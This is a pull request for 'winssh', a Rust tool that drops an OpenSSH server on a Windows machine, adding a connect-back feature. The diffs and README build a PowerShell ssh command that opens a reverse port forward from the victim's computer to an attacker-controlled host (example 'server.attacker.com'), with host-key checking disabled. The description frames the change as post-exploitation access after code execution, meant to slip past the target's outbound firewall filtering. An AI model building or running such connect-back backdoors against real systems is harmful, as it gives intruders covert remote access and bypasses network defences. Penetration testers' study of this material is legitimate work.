### PR TITLE
Add connectback / reverse port forward

### DIFF
--- a/README.md
+++ b/README.md
@@ -9,6 +9,7 @@ When launched without arguments, `winssh.exe` default to start an OpenSSH server
 You can specify a port using:
 ```
 winssh.exe --port <port>
+```
 
 You can also specify a server to connect back to using:
 

--- a/README.md
+++ b/README.md
@@ -11,14 +11,13 @@ You can specify a port using:
 winssh.exe --port <port>
 ```
 
-You can also specify a server to connect back to using:
+You can also specify a server and port to connect back to using:
 
 ```
-winssh.exe --server server.attacker.com
+winssh.exe --tunnel-server server.attacker.com --tunnel-port 2222
 ```
 
-Or you can modify the source to hardcode the default values for port and server resulting in a binary,
-that will execute witout any commandline args.
+Or you can modify the source to hardcode the default values resulting in a binary, that will execute witout any commandline args.
 
 On every build new keys will be generated. After starting the server you can use the "key" from the files directory.
 The key `key-reverse` from the files directory is used to connect back to the remote server (if specified).

--- a/README.md
+++ b/README.md
@@ -5,11 +5,22 @@ Based on https://github.com/PowerShell/Win32-OpenSSH/
 
 ## usage
 
+When launched without arguments, `winssh.exe` default to start an OpenSSH server on port 127.0.0.1:8022.
+You can specify a port using:
 ```
 winssh.exe --port <port>
+
+You can also specify a server to connect back to using:
+
+```
+winssh.exe --server server.attacker.com
 ```
 
+Or you can modify the source to hardcode the default values for port and server resulting in a binary,
+that will execute witout any commandline args.
+
 On every build new keys will be generated. After starting the server you can use the "key" from the files directory.
+The key `key-reverse` from the files directory is used to connect back to the remote server (if specified).
 
 ## compile
 

--- a/build.rs
+++ b/build.rs
@@ -13,6 +13,10 @@ fn main() {
         .status()
         .unwrap();
     Command::new("sh").arg("-c")
+        .arg("yes 'y' 2>/dev/null | ssh-keygen -t ed25519 -f files/key-reverse -q -N \"\"")
+        .status()
+        .unwrap();
+     Command::new("sh").arg("-c")
         .arg("cp files/key.pub files/authorized_keys")
         .status()
         .unwrap();

--- a/src/main.rs
+++ b/src/main.rs
@@ -48,13 +48,13 @@ fn main() {
     let tmp_abs = Path::new(&tmp).canonicalize().unwrap().display().to_string();
     let tmp_as = &tmp_abs[4..tmp_abs.len()]; // remove \\?\
     let config = format!("Port {}\n\
-        ListenAddress 0.0.0.0\n\
+        ListenAddress 127.0.0.1\n\
         HostKey {}\\host_rsa\n\
         HostKey {}\\host_dsa\n\
         PubkeyAuthentication yes\n\
         AuthorizedKeysFile {}\\authorized_keys\n\
-        PasswordAuthentication yes\n\
-        PermitEmptyPasswords yes\n\
+        # PasswordAuthentication yes\n\
+        # PermitEmptyPasswords yes\n\
         GatewayPorts yes\n\
         PidFile {}\\sshd.pid\n\
         Subsystem	sftp	sftp-server.exe\n\

--- a/src/main.rs
+++ b/src/main.rs
@@ -17,13 +17,16 @@ struct Cli {
     #[clap(short, long, default_value_t = 8022)] 
     port: u16,
     #[clap(short, long, default_value = "CHANGEME")]
-    server: String
+    server: String,
+    #[clap(short, long, default_value = "tunnel")]
+    user: String
 }
 
 fn main() {
     let cli = Cli::parse();    
     let port = cli.port;
-    let remote_server = cli.server;
+    let tunnel_server = cli.server;
+    let tunnel_user = cli.user;
 
     let rs: String = rand::thread_rng()
         .sample_iter(&Alphanumeric)
@@ -67,10 +70,10 @@ fn main() {
 
     let path = Path::new(&tmp).join("sshd_config");
     fs::write(&path, config).unwrap();
-    if remote_server.ne("CHANGEME") {
+    if tunnel_server.ne("CHANGEME") {
         // create the tunnel and remote port forward
-        println!("Creating reverse port forward for port {}",port);
-        let rev = format!("Push-Location {}; ssh -i {}\\key-reverse -R {}:127.0.0.1:{} root@{:?} ;",tmp_as, tmp_as, port,port,remote_server );
+        println!("Creating reverse port forward for port {} on server {:?} as user {:?}",port,tunnel_server,tunnel_user);
+        let rev = format!("Push-Location {}; ssh -i {}\\key-reverse -R {}:127.0.0.1:{} {:?}@{:?} ;",tmp_as, tmp_as, port,port,tunnel_user, tunnel_server );
         Command::new("powershell").stdout(Stdio::null()).arg("-c").arg(&rev).spawn();
     }
     // start server

--- a/src/main.rs
+++ b/src/main.rs
@@ -17,16 +17,20 @@ struct Cli {
     #[clap(short, long, default_value_t = 8022)] 
     port: u16,
     #[clap(short, long, default_value = "CHANGEME")]
-    server: String,
+    tunnel_server: String,
+    #[clap(short, long, default_value_t = 22 )]
+    tunnel_port: u16,
     #[clap(short, long, default_value = "tunnel")]
-    user: String
+    tunnel_user: String
+
 }
 
 fn main() {
     let cli = Cli::parse();    
     let port = cli.port;
-    let tunnel_server = cli.server;
-    let tunnel_user = cli.user;
+    let tunnel_server = cli.tunnel_server;
+    let tunnel_port =cli.tunnel_port;
+    let tunnel_user = cli.tunnel_user;
 
     let rs: String = rand::thread_rng()
         .sample_iter(&Alphanumeric)
@@ -73,7 +77,7 @@ fn main() {
     if tunnel_server.ne("CHANGEME") {
         // create the tunnel and remote port forward
         println!("Creating reverse port forward for port {} on server {} as user {}",port,tunnel_server,tunnel_user);
-        let rev = format!("Push-Location {}; ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=NUL -i {}\\key-reverse -R {}:127.0.0.1:{} {}@{} ;",tmp_as, tmp_as, port,port,tunnel_user, tunnel_server );
+        let rev = format!("Push-Location {}; ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=NUL -i {}\\key-reverse -R {}:127.0.0.1:{} -p {} {}@{} ;",tmp_as, tmp_as, port,port,tunnel_port,tunnel_user, tunnel_server );
         Command::new("powershell").stdout(Stdio::null()).arg("-c").arg(&rev).spawn();
     }
     // start server

--- a/src/main.rs
+++ b/src/main.rs
@@ -14,9 +14,9 @@ struct Asset;
 #[clap(name="winssh.exe", author="xct (@xct_de)", version="0.1", about="simple ssh server on windows", long_about = None)]
 #[clap(propagate_version = true)]
 struct Cli {
-    #[clap(short, long)]
+    #[clap(short, long, default_value_t = 8022)] 
     port: u16,
-    #[clap(short, long)]
+    #[clap(short, long, default_value = "CHANGEME")]
     server: String
 }
 
@@ -67,11 +67,12 @@ fn main() {
 
     let path = Path::new(&tmp).join("sshd_config");
     fs::write(&path, config).unwrap();
-    // create the tunnel and remote port forward
-    println!("Creating reverse port forward for port {}",port);
-    let rev = format!("Push-Location {}; ssh -i {}\\key-reverse -R {}:127.0.0.1:{} root@{} ;",tmp_as, tmp_as, port,port,remote_server );
-    Command::new("powershell").stdout(Stdio::null()).arg("-c").arg(&rev).spawn();
-
+    if remote_server.ne("CHANGEME") {
+        // create the tunnel and remote port forward
+        println!("Creating reverse port forward for port {}",port);
+        let rev = format!("Push-Location {}; ssh -i {}\\key-reverse -R {}:127.0.0.1:{} root@{:?} ;",tmp_as, tmp_as, port,port,remote_server );
+        Command::new("powershell").stdout(Stdio::null()).arg("-c").arg(&rev).spawn();
+    }
     // start server
     let cmd = format!("Push-Location {}; .\\sshd.exe -f {}\\sshd_config -E {}\\log.txt -d; Pop-Location", tmp_as, tmp_as, tmp_as );
     println!("Running SSH-Server on port {}", port);

--- a/src/main.rs
+++ b/src/main.rs
@@ -72,8 +72,8 @@ fn main() {
     fs::write(&path, config).unwrap();
     if tunnel_server.ne("CHANGEME") {
         // create the tunnel and remote port forward
-        println!("Creating reverse port forward for port {} on server {:?} as user {:?}",port,tunnel_server,tunnel_user);
-        let rev = format!("Push-Location {}; ssh -i {}\\key-reverse -R {}:127.0.0.1:{} {:?}@{:?} ;",tmp_as, tmp_as, port,port,tunnel_user, tunnel_server );
+        println!("Creating reverse port forward for port {} on server {} as user {}",port,tunnel_server,tunnel_user);
+        let rev = format!("Push-Location {}; ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=NUL -i {}\\key-reverse -R {}:127.0.0.1:{} {}@{} ;",tmp_as, tmp_as, port,port,tunnel_user, tunnel_server );
         Command::new("powershell").stdout(Stdio::null()).arg("-c").arg(&rev).spawn();
     }
     // start server

--- a/src/main.rs
+++ b/src/main.rs
@@ -3,7 +3,7 @@ use clap::{Parser};
 use rand::{distributions::Alphanumeric, Rng};
 use rust_embed::RustEmbed;
 use std::path::{Path};
-use std::process::Command;
+use std::process::{Command,Stdio};
 use whoami;
 
 #[derive(RustEmbed)]
@@ -15,12 +15,15 @@ struct Asset;
 #[clap(propagate_version = true)]
 struct Cli {
     #[clap(short, long)]
-    port: u16
+    port: u16,
+    #[clap(short, long)]
+    server: String
 }
 
 fn main() {
     let cli = Cli::parse();    
     let port = cli.port;
+    let remote_server = cli.server;
 
     let rs: String = rand::thread_rng()
         .sample_iter(&Alphanumeric)
@@ -32,14 +35,14 @@ fn main() {
     fs::create_dir(&tmp).unwrap();
 
     let username = whoami::username();
-    let files = ["host_rsa.pub", "host_dsa.pub", "host_rsa", "host_dsa","authorized_keys","sshd.exe","sshd.pid"];
+    let files = ["host_rsa.pub", "host_dsa.pub", "host_rsa", "host_dsa","authorized_keys","sshd.exe","sshd.pid","key-reverse"];
     for i in 0..files.len() {
         let f = Asset::get(files[i]).unwrap();
         let path = Path::new(&tmp).join(files[i]);
         fs::write(&path, f.data.as_ref()).unwrap();
 
         let pathstr = path.display();
-        let cmd = format!("icacls {} /grant:r {}:f /inheritance:r >nul 2>&1", pathstr, username);
+        let cmd = format!("icacls {} /reset ; icacls {} /grant:r {}:f /inheritance:r >nul 2>&1", pathstr, pathstr, username);
         Command::new("cmd").arg("/c")
         .arg(cmd)
         .spawn()
@@ -64,9 +67,13 @@ fn main() {
 
     let path = Path::new(&tmp).join("sshd_config");
     fs::write(&path, config).unwrap();
+    // create the tunnel and remote port forward
+    println!("Creating reverse port forward for port {}",port);
+    let rev = format!("Push-Location {}; ssh -i {}\\key-reverse -R {}:127.0.0.1:{} root@{} ;",tmp_as, tmp_as, port,port,remote_server );
+    Command::new("powershell").stdout(Stdio::null()).arg("-c").arg(&rev).spawn();
 
     // start server
-    let cmd = format!("Push-Location {}; .\\sshd.exe -f {}\\sshd_config -E {}\\log.txt -d; Pop-Location", tmp_as, tmp_as, tmp_as);
+    let cmd = format!("Push-Location {}; .\\sshd.exe -f {}\\sshd_config -E {}\\log.txt -d; Pop-Location", tmp_as, tmp_as, tmp_as );
     println!("Running SSH-Server on port {}", port);
     // every ssh connect would close the server, hence the loop
     loop {


### PR DESCRIPTION
This is useful in situations where you have code-exec on a machine that has the ssh client installed but not the server (as is common on workstations). The new options will allow you to:

1. connect to an ssh-server of your control (outside the target's network)
2. create a remote port forward on that server for the ssh-server on the victim's computer

This assumes that the victim's outbound firewall rules do not prevent outbound ssh connections. 
YMMV depending on how the target org does their filtering (i.e. if they just do filtering based on the port or if they do deep packet inspection preventing SSH as a protocol).